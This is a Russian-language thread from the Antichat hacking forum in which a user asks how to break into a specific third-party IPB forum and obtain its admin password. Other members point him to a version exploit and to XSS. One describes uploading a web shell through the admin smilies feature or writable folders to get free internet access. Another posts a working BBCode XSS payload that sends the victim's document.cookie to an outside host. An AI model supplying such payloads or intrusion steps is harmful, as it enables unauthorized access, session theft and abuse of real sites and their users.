HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Взлом IPB
  #1  
Старый 07.12.2005, 16:59
Diablo
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
С нами: 10793126

Репутация: 111
Wink Взлом IPB

Есть форум (forum.prov.ru)
Знаю, что он на IPB, но проблемма в том, что я незнаю версию.
Скажите как взломать этот форум, и достать пароль админа ?
Только не надо все готовое - я сам хочу взломать.
 
Ответить с цитированием

  #2  
Старый 07.12.2005, 17:04
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию

Версия: _http://forum.prov.ru/admin.php
Как взломать: Сам же сказал, что сам хочешь. Поиск по форуму используй.
__________________
Full DNS report
 
Ответить с цитированием

  #3  
Старый 07.12.2005, 18:45
Lord Nikon
Banned
Регистрация: 12.09.2005
Сообщений: 242
С нами: 10873826

Репутация: 22
По умолчанию

пробуй сплойт для ipb до 2.0.4 на rst.void.ru если не подойдет сплойт можно вывод что это версия форума либо 2.0.4 либо выше,наверно понятно =)
 
Ответить с цитированием

  #4  
Старый 07.12.2005, 19:38
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами: 10915586

Репутация: 54
По умолчанию

Если не получится сплойт, используй xss-уязвимость.
 
Ответить с цитированием

  #5  
Старый 07.12.2005, 20:27
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию

Бедный Azazel какой раз говорит что используете поиск прежде чем создавать тему.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #6  
Старый 07.12.2005, 22:15
africanec
Banned
Регистрация: 11.09.2005
Сообщений: 254
С нами: 10875266

Репутация: -12
По умолчанию

Цитата:
Сообщение от SanyaX  
Бедный Azazel какой раз говорит что используете поиск прежде чем создавать тему.
Азазель это же дама )
2diablo
если ето провайдера форум и у тебя получиться попасть в админку сможешь залить шелл через
смайлики или если неполучиться так прочитай
статью на сайте или в форуме есть тема я создавал
там как залить в папку открытую на запись
папки (/uploads/ u /lang/-воснавном ета папка открыта когда форум русифицируют ну где смотрел везде в нее есть доступ на запись
так вот главное можешь заить анонимайзер какойнить и получить инет нахаляву
----------------------------------------------------
1 если тебя спалят а это обязательно тебя либо отключат и ты заплатишь за штраф и за траффик
2.либо просто заплатишь за траффик
 
Ответить с цитированием

  #7  
Старый 08.12.2005, 14:03
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию

Цитата:
Сообщение от SanyaX  
Бедный Azazel какой раз говорит что используете поиск прежде чем создавать тему.
Азазель это же дама )
Сам ты дама. Вот он я
__________________
Full DNS report
 
Ответить с цитированием

  #8  
Старый 08.12.2005, 16:24
Diablo
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
С нами: 10793126

Репутация: 111
По умолчанию

Так, стоп. Версия форума - 2.0.4
Я там зарегестрирован.
Подробно - что делать дальше ?
 
Ответить с цитированием

  #9  
Старый 08.12.2005, 16:32
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
С нами: 10798886

Репутация: 523


По умолчанию

Цитата:
Я там зарегестрирован.
Подробно - что делать дальше ?
А больше ничего делать и не нужно=))) лол
Ты прям так сказал вроде зарегаться на форуме это уже пол дела.
А если серьёзно, то попробуй XSS-атаку провести. Юзай поиск по форуму это уже не раз обсуждалось.

ЗЫ вот попробуй заюзать:

Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
С тебя репутация, если помог=))))

Последний раз редактировалось <<YaYaYa>>; 08.12.2005 в 16:38..
 
Ответить с цитированием

  #10  
Старый 08.12.2005, 16:37
Diablo
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
С нами: 10793126

Репутация: 111
По умолчанию

Цитата:
Сообщение от <<YaYaYa>>  
ЗЫ вот попробуй заюзать
Код для IPB:
Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
С тебя репутация, если помог=))))
А что это такое ? И куда писать ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сайтов Болталка 15 31.07.2008 12:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.